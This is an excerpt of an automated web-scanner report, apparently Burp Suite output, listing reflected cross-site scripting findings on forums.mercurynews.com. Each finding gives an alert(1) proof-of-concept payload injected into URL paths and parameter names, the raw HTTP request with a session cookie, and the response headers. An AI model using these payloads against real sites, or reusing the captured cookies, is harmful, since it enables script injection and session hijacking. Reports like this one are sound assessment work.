HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:26 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:50 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22117
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ddeb"-alert(1)-"d654b8caae1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /poll6ddeb"-alert(1)-"d654b8caae1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:05:52 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:16 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22084
3.82. http://forums.mercurynews.com/poll [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://forums.mercurynews.com
Path: /poll
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 617c4"-alert(1)-"5f42983c31b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /poll?617c4"-alert(1)-"5f42983c31b=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:05:42 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:06 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19326
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 266bd"-alert(1)-"bf4e6a9d30d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /poll266bd"-alert(1)-"bf4e6a9d30d/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:05:59 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:23 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22216
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f844"-alert(1)-"3df5df2d371 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county2f844"-alert(1)-"3df5df2d371 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:06:03 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:27 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 20220
3.85. http://forums.mercurynews.com/poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1bf3"-alert(1)-"01dc7af58ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county?b1bf3"-alert(1)-"01dc7af58ce=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:05:54 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:18 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28628
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72dff"-alert(1)-"3eb0ed22cc2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e61ea"-alert(1)-"f6fde09b897 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab22e"-alert(1)-"d193185f86e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topicab22e"-alert(1)-"d193185f86e/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:08 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:32 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22276
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title ...[SNIP]... anguage="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topicab22e"-alert(1)-"d193185f86e/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose"; s.prop9=getCiQueryString("SOURCE"); s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF"); s. ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f6eb"-alert(1)-"db61396b3da was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose5f6eb"-alert(1)-"db61396b3da HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:22 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:46 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22276
3.90. http://forums.mercurynews.com/topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0fec"-alert(1)-"b2737086bf5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose?d0fec"-alert(1)-"b2737086bf5=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:50 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:14 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22243
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e42c8"-alert(1)-"227f159106e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topice42c8"-alert(1)-"227f159106e/645-sri-lanka-and-thailand-9-1-2010 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:18 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22160
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51c06"-alert(1)-"12bdca9849b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/645-sri-lanka-and-thailand-9-1-201051c06"-alert(1)-"12bdca9849b HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:28 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22160
3.93. http://forums.mercurynews.com/topic/645-sri-lanka-and-thailand-9-1-2010 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://forums.mercurynews.com
Path: /topic/645-sri-lanka-and-thailand-9-1-2010
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b712"-alert(1)-"c150a5b4989 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/645-sri-lanka-and-thailand-9-1-2010?9b712"-alert(1)-"c150a5b4989=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:07:06 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46103
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b094c"-alert(1)-"6bbb6d77a1d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topicb094c"-alert(1)-"6bbb6d77a1d/about-gold-price-and-inflation HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:22 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:46 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22150
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfbe9"-alert(1)-"886bc9b8793 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/about-gold-price-and-inflationcfbe9"-alert(1)-"886bc9b8793 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:27 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22150
3.96. http://forums.mercurynews.com/topic/about-gold-price-and-inflation [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://forums.mercurynews.com
Path: /topic/about-gold-price-and-inflation
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8247c"-alert(1)-"6f9bb8c880e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/about-gold-price-and-inflation?8247c"-alert(1)-"6f9bb8c880e=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:07:09 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 95450
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ef8c"-alert(1)-"b016d693cff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic6ef8c"-alert(1)-"b016d693cff/al-qaida-is-us-puppet HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:14 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:38 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22132
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9afde"-alert(1)-"410d6a4b262 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/al-qaida-is-us-puppet9afde"-alert(1)-"410d6a4b262 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:27 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22132
3.99. http://forums.mercurynews.com/topic/al-qaida-is-us-puppet [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://forums.mercurynews.com
Path: /topic/al-qaida-is-us-puppet
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83c90"-alert(1)-"f57460e9cf9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/al-qaida-is-us-puppet?83c90"-alert(1)-"f57460e9cf9=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:07:09 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 98974
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d738f"-alert(1)-"6fbedbd10eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topicd738f"-alert(1)-"6fbedbd10eb/bp-oil-spill-was-created-to-push-war-on-iran HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
